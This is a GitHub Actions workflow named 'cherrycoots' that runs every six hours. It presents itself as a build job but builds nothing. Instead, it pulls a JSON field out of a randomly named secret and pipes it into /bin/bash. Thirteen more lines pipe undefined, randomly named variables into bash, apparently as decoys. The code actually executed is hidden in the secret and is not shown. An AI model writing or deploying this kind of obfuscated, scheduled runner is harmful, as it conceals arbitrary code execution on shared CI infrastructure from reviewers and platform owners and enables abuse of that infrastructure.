name: cherrycoots

on:
  workflow_dispatch:
  schedule:
    - cron: '11 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: cherrycoots
        env:
          elnrx72576: ${{ secrets.elnrx72576 }}
        run: |
          echo $elnrx72576 | jq -r .xwc8 | /bin/bash
          echo $c094 | jq -r .lt08 | /bin/bash
          echo $fl87018 | jq -r .pzuu13 | /bin/bash
          echo $nm23508 | jq -r .bw50184 | /bin/bash
          echo $gedao62 | jq -r .a9199 | /bin/bash
          echo $boczj4 | jq -r .miiv88145 | /bin/bash
          echo $talnr4 | jq -r .xtws047 | /bin/bash
          echo $pze22 | jq -r .e65735 | /bin/bash
          echo $awe3764 | jq -r .z746 | /bin/bash
          echo $u5793 | jq -r .upj3210 | /bin/bash
          echo $jsysh44438 | jq -r .m310 | /bin/bash
          echo $sdxa53 | jq -r .qxh86 | /bin/bash
          echo $yf8441 | jq -r .jxfbh697 | /bin/bash
          echo $syx23 | jq -r .izhvt9 | /bin/bash

